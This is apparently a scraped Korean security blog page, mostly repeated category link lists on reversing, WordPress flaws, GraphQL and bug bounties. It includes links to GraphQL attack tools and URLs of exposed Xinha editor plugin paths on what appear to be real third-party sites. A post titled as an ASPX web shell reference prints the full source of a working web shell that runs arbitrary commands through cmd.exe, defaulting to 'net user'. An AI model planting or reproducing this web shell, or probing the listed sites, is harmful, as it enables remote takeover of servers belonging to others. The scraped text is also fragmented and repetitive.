'리버싱' 카테고리의 다른 글
IAT & EAT 정리 (0) | 2022.04.27 |
---|---|
RVA to RWA 쉽게 계산하기 [펌] (0) | 2022.04.27 |
C#은 SecureSting 클래스 (0) | 2021.07.09 |
.Net De'obfuscator 분석(진행 중) (0) | 2020.11.08 |
게임 해킹 띠오리(경로) (0) | 2020.11.02 |
IAT & EAT 정리 (0) | 2022.04.27 |
---|---|
RVA to RWA 쉽게 계산하기 [펌] (0) | 2022.04.27 |
C#은 SecureSting 클래스 (0) | 2021.07.09 |
.Net De'obfuscator 분석(진행 중) (0) | 2020.11.08 |
게임 해킹 띠오리(경로) (0) | 2020.11.02 |
wordpress 대표적인 취약점 정리 (0) | 2022.04.29 |
---|---|
Wordpress 정리 (0) | 2022.04.29 |
graphql insql (0) | 2022.04.23 |
xinha 에디터 추가 (0) | 2022.04.20 |
aspx 웹쉘 참고 (0) | 2022.04.19 |
https://github.com/doyensec/inql
https://blog.assetnote.io/2021/08/29/exploiting-graphql/
https://www.jython.org/download
https://book.hacktricks.xyz/pentesting/pentesting-web/graphql
Wordpress 정리 (0) | 2022.04.29 |
---|---|
CSRF 참고 hacktricks (0) | 2022.04.23 |
xinha 에디터 추가 (0) | 2022.04.20 |
aspx 웹쉘 참고 (0) | 2022.04.19 |
HTTP Request Smuggling (0) | 2022.04.09 |
http://neon.com.my/editor/xinha/examples/
http://neon.com.my/editor/xinha/plugins/GetHtml/
https://als.uam.edu.pa/xinha/plugins/ImageManager/
CSRF 참고 hacktricks (0) | 2022.04.23 |
---|---|
graphql insql (0) | 2022.04.23 |
aspx 웹쉘 참고 (0) | 2022.04.19 |
HTTP Request Smuggling (0) | 2022.04.09 |
서버버전 정보 노출 대응방안 (0) | 2022.02.25 |
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
<%@ Page Language="VB" Debug="true" %> | |
<%@ import Namespace="system.IO" %> | |
<%@ import Namespace="System.Diagnostics" %> | |
<script runat="server"> | |
Sub RunCmd(Src As Object, E As EventArgs) | |
Dim myProcess As New Process() | |
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text) | |
myProcessStartInfo.UseShellExecute = false | |
myProcessStartInfo.RedirectStandardOutput = true | |
myProcess.StartInfo = myProcessStartInfo | |
myProcessStartInfo.Arguments=xcmd.text | |
myProcess.Start() | |
Dim myStreamReader As StreamReader = myProcess.StandardOutput | |
Dim myString As String = myStreamReader.Readtoend() | |
myProcess.Close() | |
mystring=replace(mystring,"<","<") | |
mystring=replace(mystring,">",">") | |
result.text= vbcrlf & "<pre>" & mystring & "</pre>" | |
End Sub | |
</script> | |
<html> | |
<body> | |
<form runat="server"> | |
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label> | |
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox> | |
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label> | |
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox> | |
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button> | |
<p><asp:Label id="result" runat="server"></asp:Label> | |
</form> | |
</body> | |
</html> |
graphql insql (0) | 2022.04.23 |
---|---|
xinha 에디터 추가 (0) | 2022.04.20 |
HTTP Request Smuggling (0) | 2022.04.09 |
서버버전 정보 노출 대응방안 (0) | 2022.02.25 |
SSTF Github (0) | 2022.02.23 |
Zendesk Bug Bounty (0) | 2023.05.15 |
---|---|
apple-vulnerability-bug-bounty (0) | 2021.06.29 |
안전하지 않은 직접 객체 참조 (IDOR 공격) (0) | 2021.06.29 |
apple 버그바운티 사례 (0) | 2021.01.17 |
국내 버그바운티 진행 (ex. 해킹존) (0) | 2021.01.17 |
xinha 에디터 추가 (0) | 2022.04.20 |
---|---|
aspx 웹쉘 참고 (0) | 2022.04.19 |
서버버전 정보 노출 대응방안 (0) | 2022.02.25 |
SSTF Github (0) | 2022.02.23 |
LDAP 인젝션 (0) | 2022.01.20 |